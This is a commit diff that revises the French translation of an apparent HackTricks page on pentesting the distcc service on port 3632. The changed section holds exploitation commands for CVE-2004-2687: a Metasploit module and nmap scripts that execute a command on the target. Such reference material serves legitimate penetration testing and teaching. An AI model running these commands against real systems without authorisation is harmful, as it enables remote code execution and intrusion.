Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

This commit is contained in:
Translator 2024-03-11 14:45:12 +00:00
parent b2c51ed889
commit 09d2dcb0ca

View file

@ -24,14 +24,14 @@ PORT STATE SERVICE
```
# Exploitation
Vérifiez si elle est vulnérable à **CVE-2004-2687** pour exécuter du code arbitraire :
Vérifiez si le système est vulnérable à **CVE-2004-2687** pour exécuter du code arbitraire :
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Aucun service ne détecte ce service shodan._
_Je ne pense pas que Shodan détecte ce service._
# Ressources
@ -51,6 +51,6 @@ Autres façons de soutenir HackTricks:
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts github.
</details>